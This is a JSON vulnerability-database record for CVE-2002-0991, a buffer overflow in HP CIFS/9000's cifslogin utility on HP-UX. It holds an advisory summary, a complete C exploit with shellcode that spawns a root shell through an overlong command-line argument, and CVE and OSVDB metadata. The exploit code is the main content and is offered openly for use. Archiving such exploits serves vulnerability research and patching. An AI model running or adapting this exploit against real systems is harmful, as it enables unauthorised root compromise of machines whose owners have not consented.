{"bulletinFamily": "exploit", "id": "EDB-ID:21577", "cvelist": ["CVE-2002-0991"], "modified": "2002-11-06T00:00:00", "lastseen": "2016-02-02T16:48:27", "edition": 1, "sourceData": "source: http://www.securityfocus.com/bid/5088/info\r\n\r\nA vulnerability has been reported in the /opt/cifsclient/bin/cifslogin utility distributed with CIFS/9000. The utility is prone to several buffer overflow conditions and may lead to root compromise.\r\n\r\nThe vulnerability occurs due to the lack of bounds checking when accepting user input for various commandline options. Specifically, the utility fails to check for excessively long arguments to the following commandline options: '-U', '-D', '-P', '-S', '-N', and '-u'.\r\n\r\n/*\r\nName : ex_cifslogin.c\r\nCompile : cc ex_cifslogin -o cifslogin\r\nPurpose : exploit cifslogin command for HP-UX 11.11 11.0 10.20\ufffd\ufffdto get root shell\r\nAuthor : watercloud < safesuite@263.net, watercloud@xfocus.net >\r\nDate : 2002-11-6\r\nAnnounce: Use as your own risk\ufffd\ufffd\r\nThanks : bear < bearundertree@163.com >\r\nTested : HPUX B11.11\r\n*/\r\n#include<stdio.h>\r\n\r\n#define T_LEN 2304\r\n#define BUFF_LEN 2176\r\n#define NOP 0x0b390280\r\n\r\nchar shellcode[]=\r\n \"\\xe8\\x3f\\x1f\\xfd\\xb4\\x23\\x03\\xe8\\x60\\x60\\x3c\\x61\\x0b\\x39\\x02\"\r\n \"\\x99\\x34\\x1a\\x3c\\x53\\x0b\\x43\\x06\\x1a\\x20\\x20\\x08\\x01\\x34\\x16\\x03\"\r\n \"\\xe8\\xe4\\x20\\xe0\\x08\\x96\\xd6\\x03\\xfe/bin/shA\";\r\nlong addr;\r\nchar buffer[T_LEN];\r\n\r\nmain()\r\n{\r\n int addr_off =800 ;\r\n\r\n int n=BUFF_LEN/4,i=0;\r\n long * ap = (long *) &buffer[BUFF_LEN];\r\n char * sp = &buffer[BUFF_LEN-strlen(shellcode)];\r\n long * np = (long *) buffer;\r\n\r\n addr = ((long) &addr_off + T_LEN ) & 0xffffff40 +0x40 ;\r\n\r\n for(i=0;i<n;np[i++]=NOP);\r\n memcpy(sp,shellcode,strlen(shellcode));\r\n for(i=0;i<(T_LEN-BUFF_LEN)/4;ap[i++]=addr+addr_off);\r\n\r\n printf(\"SP=0x%x EXP_SP=0x%x OFF=0x%x (%i)\\n\",(long)&addr_off & 0xffffff40,addr,addr_off);\r\n printf(\"Addr =0x%x NOP_LEN=%i\\n\",addr+addr_off,BUFF_LEN-strlen(shellcode));\r\n printf(\"BUFFER_LEN=%i\\n\",strlen(buffer));\r\n\r\n execl(\"/opt/cifsclient/bin/cifslogin\",\"cifslogin\",\"123\",buffer,NULL);\r\n}\r\n\r\n", "published": "2002-11-06T00:00:00", "href": "https://www.exploit-db.com/exploits/21577/", "osvdbidlist": ["11362"], "reporter": "watercloud", "hash": "bbd9ad91dbb872b504f3f7044cfbdbd82f3fdbc604676ad0beb42b00f3d4da00", "title": "HP CIFS/9000 Server A.01.05/A.01.06 - Buffer Overflow Vulnerability", "history": [], "type": "exploitdb", "objectVersion": "1.0", "description": "HP CIFS/9000 Server A.01.05/A.01.06 Buffer Overflow Vulnerability. CVE-2002-0991 . Local exploit for hp-ux platform", "references": [], "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/21577/", "enchantments": {"vulnersScore": 3.2}}

{"result": {"cve": [{"id": "CVE-2002-0991", "type": "cve", "title": "CVE-2002-0991", "description": "Buffer overflows in the cifslogin command for HP CIFS/9000 Client A.01.06 and earlier, based on the Sharity package, allows local users to gain root privileges via long (1) -U, (2) -D, (3) -P, (4) -S, (5) -N, or (6) -u parameters.", "published": "2002-10-04T00:00:00", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2002-0991", "cvelist": ["CVE-2002-0991"], "lastseen": "2016-09-03T03:30:44"}], "osvdb": [{"id": "OSVDB:11362", "type": "osvdb", "title": "HP CIFS/9000 cifslogin Multiple Parameter Overflow", "description": "# No description provided by the source\n\n## References:\nMail List Post: http://archives.neohapsis.com/archives/bugtraq/2002-06/0300.html\nISS X-Force ID: 9431\n[CVE-2002-0991](https://vulners.com/cve/CVE-2002-0991)\nBugtraq ID: 5088\n", "published": "2002-06-02T00:00:00", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "https://vulners.com/osvdb/OSVDB:11362", "cvelist": ["CVE-2002-0991"], "lastseen": "2017-04-28T13:20:06"}]}}